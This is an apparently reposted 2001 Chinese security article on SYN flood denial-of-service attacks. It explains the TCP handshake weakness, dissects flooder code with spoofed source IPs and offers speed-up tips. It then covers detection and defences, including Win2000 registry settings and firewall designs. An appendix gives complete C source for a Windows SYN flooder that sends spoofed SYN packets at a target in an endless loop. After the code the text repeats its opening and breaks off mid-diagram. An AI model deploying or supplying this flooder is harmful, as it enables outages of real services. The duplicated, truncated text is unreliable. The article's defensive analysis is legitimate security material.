SYN Flood的基本原理
建立时间:2001-06-28
文章属性:转载
文章来源: http://shotgun.patching.net/syn.htm
文章提交: xundi (xundi_at_xfocus.org)
Shotgun
首发于天极网
第一部分 SYN Flood的基本原理
SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP链接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。
要明白这种攻击的基本原理,仍是要从TCP链接创建的过程开始提及:
你们都知道,TCP与UDP不一样,它是基于链接的,也就是说:为了在服务端和客户端之间传送TCP数据,必须先创建一个虚拟电路,也就是TCP链接,创建TCP链接的标准过程是这样的:
首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP链接的初始序号;
第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement)。
第三步,客户端也返回一个确认报文ACK给服务器端,一样TCP序列号被加一,到此一个TCP链接完成。
以上的链接过程在TCP协议中被称为三次握手(Three-way Handshake)。
问题就出在TCP链接的三次握手中,假设一个用户向服务器发送了SYN报文后忽然死机或掉线,那么服务器在发出SYN+ACK应答报文后是没法收到客户端 的ACK报文的(第三次握手没法完成),这种状况下服务器端通常会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的链接,这段时 间的长度咱们称为SYN Timeout,通常来讲这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常致使服务器的一个线程等待1分钟并非什么很大的问题,但如 果有一个恶意的攻击者大量模拟这种状况,服务器端将为了维护一个很是大的半链接列表而消耗很是多的资源----数以万计的半链接,即便是简单的保存并遍历 也会消耗很是多的CPU时间和内存,况且还要不断对这个列表中的IP进行SYN+ACK的重试。实际上若是服务器的TCP/IP栈不够强大,最后的结果往 往是堆栈溢出崩溃---即便服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP链接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比 率很是之小),此时从正常客户的角度看来,服务器失去响应,这种状况咱们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)。
从防护角度来讲,有几种简单的解决方法,第一种是缩短SYN Timeout时间,因为SYN Flood攻击的效果取决于服务器上保持的SYN半链接数,这个值=SYN攻击的频度 x SYN Timeout,因此经过缩短从接收到SYN报文到肯定这个报文无效并丢弃改链接的时间,例如设置为20秒如下(太低的SYN Timeout设置可能会影响客户的正常访问),能够成倍的下降服务器的负荷。
第二种方法是设置SYN Cookie,就是给每个请求链接的IP地址分配一个Cookie,若是短期内连续受到某个IP的重复SYN报文,就认定是受到了攻击,之后从这个IP地址来的包会被一律丢弃。
但是上述的两种方法只能对付比较原始的SYN Flood攻击,缩短SYN Timeout时间仅在对方攻击频度不高的状况下生效,SYN Cookie更依赖于对方使用真实的IP地址,若是攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP报文中的源地址,以上的 方法将毫无用武之地。
第二部份 SYN Flooder源码解读
下面咱们来分析SYN Flooder的程序实现。
首先,咱们来看一下TCP报文的格式:
0 1 2 3 4 5 6
0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| IP首部 | TCP首部 | TCP数据段 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图一 TCP报文结构
如上图所示,一个TCP报文由三个部分构成:20字节的IP首部、20字节的TCP首部与不定长的数据段,(实际操做时可能会有可选的IP选项,这种状况 下TCP首部向后顺延)因为咱们只是发送一个SYN信号,并不传递任何数据,因此TCP数据段为空。TCP首部的数据结构为:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位源端口号 | 十六位目标端口号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位序列号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位确认号 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 四位 | |U|A|P|R|S|F| |
| 首部 |六位保留位 |R|C|S|S|Y|I| 十六位窗口大小 |
| 长度 | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位校验和 | 十六位紧急指针 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 选项(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 数据(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图二 TCP首部结构
根据TCP报文格式,咱们定义一个结构TCP_HEADER用来存放TCP首部:
typedef struct _tcphdr
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度+6位保留字中的4位
unsigned char th_flag; //2位保留字+6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;
经过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010)咱们能制造一个SYN的TCP报文,经过大 量发送这个报文能够实现SYN Flood的效果。可是为了进行IP欺骗从而隐藏本身,也为了躲避服务器的SYN Cookie检查,还须要直接对IP首部进行操做:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 版本 | 长度 | 八位服务类型 | 十六位总长度 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 十六位标识 | 标志| 十三位片偏移 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 八位生存时间 | 八位协议 | 十六位首部校验和 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位源IP地址 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 三十二位目的IP地址 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 选项(如有) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 数据 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
图三 IP首部结构
一样定义一个IP_HEADER来存放IP首部
typedef struct _iphdr
{
unsigned char h_verlen; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议号(TCP, UDP 或其余)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
而后经过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));
创建一个原始套接口,因为咱们的IP源地址是伪造的,因此不能期望系统帮咱们计算IP校验和,咱们得在在setsockopt中设置IP_HDRINCL告诉系统本身填充IP首部并本身计算校验和:
flag=TRUE;
setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
IP校验和的计算方法是:首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),而后计算整个IP首部(包括选项)的二进制反码的和,一个标准的校验和函数以下所示:
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
这个函数并无通过任何的优化,因为校验和函数是TCP/IP协议中被调用最多函数之一,因此通常说来,在实现TCP/IP栈时,会根据操做系统对校验和函数进行优化。
TCP首部检验和与IP首部校验和的计算方法相同,在程序中使用同一个函数来计算。
须要注意的是,因为TCP首部中不包含源地址与目标地址等信息,为了保证TCP校验的有效性,在进行TCP校验和的计算时,须要增长一个TCP伪首部的校验和,定义以下:
struct
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz; //置空
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;
而后咱们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和:
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
计算IP校验和的时候不须要包括TCP伪首部:
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_header));
再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就能够直接发送了:
memcpy(SendBuf,&ip_header,sizeof(ip_header));
sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));
由于整个TCP报文中的全部部分都是咱们本身写入的(操做系统不会作任何干涉),因此咱们能够在IP首部中放置随机的源IP地址,若是伪造的源IP地址确 实有人使用,他在接收到服务器的SYN+ACK报文后会发送一个RST报文(标志位为00000100),通知服务器端不须要等待一个无效的链接,但是如 果这个伪造IP并无绑定在任何的主机上,不会有任何设备去通知主机该链接是无效的(这正是TCP协议的缺陷),主机将不断重试直到SYN Timeout时间后才能丢弃这个无效的半链接。因此当攻击者使用主机分布很稀疏的IP地址段进行假装IP的SYN Flood攻击时,服务器主机承受的负荷会至关的高,根据测试,一台PIII 550MHz+128MB+100Mbps的机器使用通过初步优化的SYN Flooder程序能够以16,000包/秒的速度发送TCP SYN报文,这样的攻击力已经足以拖垮大部分WEB服务器了。
稍微动动脑筋咱们就会发现,想对SYN Flooder程序进行优化是很简单的,从程序构架来看,攻击时循环内的代码主要是进行校验和计算与缓冲区的填充,通常的思路是提升校验和计算的速度,我 甚至见过用汇编代码编写的校验和函数,实际上,有另一个变通的方法能够轻松实现优化而又不须要高深的编程技巧和数学知识,(老实说吧,我数学比较 差:P),咱们仔细研究了两个不一样源地址的TCP SYN报文后发现,两个报文的大部分字段相同(好比目的地址、协议等等),只有源地址和校验和不一样(若是为了隐蔽,源端口也能够有变化,可是并不影响咱们 算法优化的思路),若是咱们事先计算好大量的源地址与校验和的对应关系表(若是其余的字段有变化也能够加入这个表),等计算完毕了攻击程序就只须要单纯的 组合缓冲区并发送(用指针来直接操做缓冲区的特定位置,从事先计算好的对应关系表中读出数据,替换缓冲区相应字段),这种简单的工做彻底取决于系统发送 IP包的速度,与程序的效率没有任何关系,这样,即便是CPU主频较低的主机也能快速的发送大量TCP SYN攻击包。若是考虑到缓冲区拼接的时间,甚至能够定义一个很大的缓冲区数组,填充完毕后再发送(雏鹰给这种方法想了一个很贴切的比喻:火箭炮装弹虽然 很慢,可是一旦炮弹上膛了之后就能够连续猛烈地发射了:)。
第三部分 SYN Flood攻击的监测与防护初探
对于SYN Flood攻击,目前尚没有很好的监测和防护方法,不过若是系统管理员熟悉攻击方法和系统架构,经过一系列的设定,也能从必定程度上下降被攻击系统的负荷,减轻负面的影响。(这正是我撰写本文的主要目的)
通常来讲,若是一个系统(或主机)负荷忽然升高甚至失去响应,使用Netstat 命令能看到大量SYN_RCVD的半链接(数量>500或占总链接数的10%以上),能够认定,这个系统(或主机)遭到了SYN Flood攻击。
遭到SYN Flood攻击后,首先要作的是取证,经过Netstat –n –p tcp >resault.txt记录目前全部TCP链接状态是必要的,若是有嗅探器,或者TcpDump之类的工具,记录TCP SYN报文的全部细节也有助于之后追查和防护,须要记录的字段有:源地址、IP首部中的标识、TCP首部中的序列号、TTL值等,这些信息虽然极可能是攻 击者伪造的,可是用来分析攻击者的心理状态和攻击程序也不无帮助。特别是TTL值,若是大量的攻击包彷佛来自不一样的IP可是TTL值却相同,咱们每每能推 断出攻击者与咱们之间的路由器距离,至少也能够经过过滤特定TTL值的报文下降被攻击系统的负荷(在这种状况下TTL值与攻击报文不一样的用户就能够恢复正 常访问)
前面曾经提到能够经过缩短SYN Timeout时间和设置SYN Cookie来进行SYN攻击保护,对于Win2000系统,还能够经过修改注册表下降SYN Flood的危害,在注册表中做以下改动:
首先,打开regedit,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
增长一个SynAttackProtect的键值,类型为REG_DWORD,取值范围是0-2,这个值决定了系统受到SYN攻击时采起的保护措施,包括减小系统SYN+ACK的重试的次数等,默认值是0(没有任何保护措施),推荐设置是2;
增长一个TcpMaxHalfOpen的键值,类型为REG_DWORD,取值范围是100-0xFFFF,这个值是系统容许同时打开的半链接,默认状况 下WIN2K PRO和SERVER是100,ADVANCED SERVER是500,这个值很难肯定,取决于服务器TCP负荷的情况和可能受到的攻击强度,具体的值须要通过试验才能决定。
增长一个TcpMaxHalfOpenRetried的键值,类型为REG_DWORD,取值范围是80-0xFFFF,默认状况下WIN2K PRO和SERVER是80,ADVANCED SERVER是400,这个值决定了在什么状况下系统会打开SYN攻击保护。
咱们来分析一下Win2000的SYN攻击保护机制:正常状况下,Win2K对TCP链接的三次握手有一个常规的设置,包括SYN Timeout时间、SYN-ACK的重试次数和SYN报文从路由器到系统再到Winsock的延时等,这个常规设置是针对系统性能进行优化的(安全和性 能每每相互矛盾)因此能够给用户提供方便快捷的服务;一旦服务器受到攻击,SYN半链接的数量超过TcpMaxHalfOpenRetried的设置,系 统会认为本身受到了SYN Flood攻击,此时设置在SynAttackProtect键值中的选项开始做用,SYN Timeout时间被减短,SYN-ACK的重试次数减小,系统也会自动对缓冲区中的报文进行延时,避免对TCP/IP堆栈形成过大的冲击,力图将攻击危 害减到最低;若是攻击强度不断增大,超过了TcpMaxHalfOpen值,此时系统已经不能提供正常的服务了,更重要的是保证系统不会崩溃,因此系统将 会丢弃任何超出TcpMaxHalfOpen值范围的SYN报文(应该是使用随机丢包策略),保证系统的稳定性。
因此,对于须要进行SYN攻击保护的系统,咱们能够测试/预测一下访问峰值时期的半链接打开量,以其做为参考设定 TcpMaxHalfOpenRetried的值(保留必定的余量),而后再以TcpMaxHalfOpenRetried的1.25倍做为 TcpMaxHalfOpen值,这样能够最大限度地发挥WIN2K自身的SYN攻击保护机制。
经过设置注册表防护SYN Flood攻击,采用的是“挨打”的策略,不管系统如何强大,始终不能光靠挨打支撑下去,除了挨打以外,“退让”也是一种比较有效的方法。
退让策略是基于SYN Flood攻击代码的一个缺陷,咱们从新来分析一下SYN Flood攻击者的流程:SYN Flood程序有两种攻击方式,基于IP的和基于域名的,前者是攻击者本身进行域名解析并将IP地址传递给攻击程序,后者是攻击程序自动进行域名解析,但 是它们有一点是相同的,就是一旦攻击开始,将不会再进行域名解析,咱们的切入点正是这里:假设一台服务器在受到SYN Flood攻击后迅速更换本身的IP地址,那么攻击者仍在不断攻击的只是一个空的IP地址,并无任何主机,而防护方只要将DNS解析更改到新的IP地址 就能在很短的时间内(取决于DNS的刷新时间)恢复用户经过域名进行的正常访问。为了迷惑攻击者,咱们甚至能够放置一台“牺牲”服务器让攻击者知足于攻击 的“效果”(因为DNS缓冲的缘由,只要攻击者的浏览器不重起,他访问的仍然是原先的IP地址)。
一样的缘由,在众多的负载均衡架构中,基于DNS解析的负载均衡自己就拥有对SYN Flood的免疫力,基于DNS解析的负载均衡能将用户的请求分配到不一样IP的服务器主机上,攻击者攻击的永远只是其中一台服务器,虽说攻击者也能不断 去进行DNS请求从而打破这种“退让”策略,可是一来这样增长了攻击者的成本,二来过多的DNS请求能够帮助咱们追查攻击者的真正踪影(DNS请求不一样于 SYN攻击,是须要返回数据的,因此很难进行IP假装)。
对于防火墙来讲,防护SYN Flood攻击的方法取决于防火墙工做的基本原理,通常说来,防火墙能够工做在TCP层之上或IP层之下,工做在TCP层之上的防火墙称为网关型防火墙,网关型防火墙与服务器、客户机之间的关系以下图所示:
外部TCP链接 内部TCP链接
[客户机] =================>[防火墙] =================>[服务器]
如上图所示,客户机与服务器之间并无真正的TCP链接,客户机与服务器之间的全部数据交换都是经过防火墙代理的,外部的DNS解析也一样指向防 火墙,因此若是网站被攻击,真正受到攻击的是防火墙,这种防火墙的优势是稳定性好,抗打击能力强,可是由于全部的TCP报文都须要通过防火墙转发,因此效 率比较低因为客户机并不直接与服务器创建链接,在TCP链接没有完成时防火墙不会去向后台的服务器创建新的TCP链接,因此攻击者没法越过防火墙直接攻击 后台服务器,只要防火墙自己作的足够强壮,这种架构能够抵抗至关强度的SYN Flood攻击。可是因为防火墙实际创建的TCP链接数为用户链接数的两倍(防火墙两端都须要创建TCP链接),同时又代理了全部的来自客户端的TCP请 求和数据传送,在系统访问量较大时,防火墙自身的负荷会比较高,因此这种架构并不能适用于大型网站。(我感受,对于这样的防火墙架构,使用 TCP_STATE攻击估计会至关有效:)
工做在IP层或IP层之下的防火墙(路由型防火墙)工做原理有所不一样,它与服务器、客户机的关系以下图所示:
[防火墙] 数据包修改转发
[客户机]========|=======================>[服务器]
TCP链接
客户机直接与服务器进行TCP链接,防火墙起的是路由器的做用,它截获全部经过的包并进行过滤,经过过滤的包被转发给服务器,外部的DNS解析也 直接指向服务器,这种防火墙的优势是效率高,能够适应100Mbps-1Gbps的流量,可是这种防火墙若是配置不当,不只可让攻击者越过防火墙直接攻 击内部服务器,甚至有可能放大攻击的强度,致使整个系统崩溃。
在这两种基本模型以外,有一种新的防火墙模型,我我的认为仍是比较巧妙的,它集中了两种防火墙的优点,这种防火墙的工做原理以下所示:
第一阶段,客户机请求与防火墙创建链接:
SYN SYN+ACK ACK
[客户机]---- >[防火墙] => [防火墙]-------- >[客户机] => [客户机]--- >[防火墙]
第二阶段,防火墙假装成客户机与后台的服务器创建链接
[防火墙]< =========== >[服务器]
TCP链接
第三阶段,以后全部从客户机来的TCP报文防火墙都直接转发给后台的服务器
防火墙转发
[客户机]< ======|======= >[服务器]
TCP链接
这种结构吸收了上两种防火墙的优势,既能彻底控制全部的SYN报文,又不须要对全部的TCP数据报文进行代理,是一种一箭双鵰的方法。
近来,国外和国内的一些防火墙厂商开始研究带宽控制技术,若是能真正作到严格控制、分配带宽,就能很大程度上防护绝大多数的拒绝服务攻击,咱们仍是拭目以待吧。
附录:Win2000下的SYN Flood程序
改编自Linux下Zakath编写的SYN Flooder
编译环境:VC++6.0,编译时须要包含ws2_32.lib
//////////////////////////////////////////////////////////////////////////
// //
// SYN Flooder For Win2K by Shotgun //
// //
// THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath //
// THANX Lion Hook FOR PROGRAM OPTIMIZATION //
// //
// Released: [2001.4] //
// Author: [Shotgun] //
// Homepage: //
// [ http://IT.Xici.Net] //
// [ http://WWW.Patching.Net] // // // ////////////////////////////////////////////////////////////////////////// #include <winsock2.h> #include <Ws2tcpip.h> #include <stdio.h> #include <stdlib.h> #define SEQ 0x28376839 #define SYN_DEST_IP "192.168.15.250"//被攻击的IP #define FAKE_IP "10.168.150.1" //假装IP的起始值,本程序的假装IP覆盖一个B类网段 #define STATUS_FAILED 0xFFFF //错误返回值 typedef struct _iphdr //定义IP首部 { unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其余) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IP_HEADER; struct //定义TCP伪首部 { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; char ptcl; //协议类型 unsigned short tcpl; //TCP长度 }psd_header; typedef struct _tcphdr //定义TCP首部 { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量 }TCP_HEADER; //CheckSum:计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } // SynFlood主函数 int main() { int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //初始化SOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)); if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //设置IP_HDRINCL以本身填充IP首部 ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //设置发送超时 ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError()); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //填充IP首部 ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度 ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节) ip_header.ident=1; //16位标识 ip_header.frag_and_flags=0; //3位标志位 ip_header.ttl=128; //8位生存时间TTL ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…) ip_header.checksum=0; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址 ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址 //填充TCP首部 tcp_header.th_sport=htons(7000); //源端口号 tcp_header.th_dport=htons(8080); //目的端口号 tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号 tcp_header.th_ack=0; //ACK序列号置为0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位 tcp_header.th_flag=2; //SYN 标志 tcp_header.th_win=htons(16384); //窗口大小 tcp_header.th_urp=0; //偏移 tcp_header.th_sum=0; //校验和 //填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr=ip_header.sourceIP; //源地址 psd_header.daddr=ip_header.destIP; //目的地址 psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; //协议类型 psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度 while(1) { //每发送10,240个报文输出一个标示符 printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1; //序列号循环 //更改IP首部 ip_header.checksum=0; //16位IP首部校验和 ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32位源IP地址 //更改TCP首部 tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号 tcp_header.th_sum=0; //校验和 //更改TCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //计算TCP校验和,计算校验和时须要包括TCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header)); //计算IP校验和 memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //填充发送缓冲区 memcpy(SendBuf,&ip_header,sizeof(ip_header)); //发送TCP报文 ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr)); if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0; }
文章属性:转载
文章来源: http://shotgun.patching.net/syn.htm
文章提交: xundi (xundi_at_xfocus.org)
Shotgun
首发于天极网
第一部分 SYN Flood的基本原理
SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP链接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。
要明白这种攻击的基本原理,仍是要从TCP链接创建的过程开始提及:
你们都知道,TCP与UDP不一样,它是基于链接的,也就是说:为了在服务端和客户端之间传送TCP数据,必须先创建一个虚拟电路,也就是TCP链接,创建TCP链接的标准过程是这样的:
首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP链接的初始序号;
第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(Acknowledgement)。
第三步,客户端也返回一个确认报文ACK给服务器端,一样TCP序列号被加一,到此一个TCP链接完成。
以上的链接过程在TCP协议中被称为三次握手(Three-way Handshake)。
问题就出在TCP链接的三次握手中,假设一个用户向服务器发送了SYN报文后忽然死机或掉线,那么服务器在发出SYN+ACK应答报文后是没法收到客户端 的ACK报文的(第三次握手没法完成),这种状况下服务器端通常会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的链接,这段时 间的长度咱们称为SYN Timeout,通常来讲这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常致使服务器的一个线程等待1分钟并非什么很大的问题,但如 果有一个恶意的攻击者大量模拟这种状况,服务器端将为了维护一个很是大的半链接列表而消耗很是多的资源----数以万计的半链接,即便是简单的保存并遍历 也会消耗很是多的CPU时间和内存,况且还要不断对这个列表中的IP进行SYN+ACK的重试。实际上若是服务器的TCP/IP栈不够强大,最后的结果往 往是堆栈溢出崩溃---即便服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP链接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比 率很是之小),此时从正常客户的角度看来,服务器失去响应,这种状况咱们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)。
从防护角度来讲,有几种简单的解决方法,第一种是缩短SYN Timeout时间,因为SYN Flood攻击的效果取决于服务器上保持的SYN半链接数,这个值=SYN攻击的频度 x SYN Timeout,因此经过缩短从接收到SYN报文到肯定这个报文无效并丢弃改链接的时间,例如设置为20秒如下(太低的SYN Timeout设置可能会影响客户的正常访问),能够成倍的下降服务器的负荷。
第二种方法是设置SYN Cookie,就是给每个请求链接的IP地址分配一个Cookie,若是短期内连续受到某个IP的重复SYN报文,就认定是受到了攻击,之后从这个IP地址来的包会被一律丢弃。
但是上述的两种方法只能对付比较原始的SYN Flood攻击,缩短SYN Timeout时间仅在对方攻击频度不高的状况下生效,SYN Cookie更依赖于对方使用真实的IP地址,若是攻击者以数万/秒的速度发送SYN报文,同时利用SOCK_RAW随机改写IP报文中的源地址,以上的 方法将毫无用武之地。
第二部份 SYN Flooder源码解读
下面咱们来分析SYN Flooder的程序实现。
首先,咱们来看一下TCP报文的格式:
0 1 2 3 4 5 6
0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4
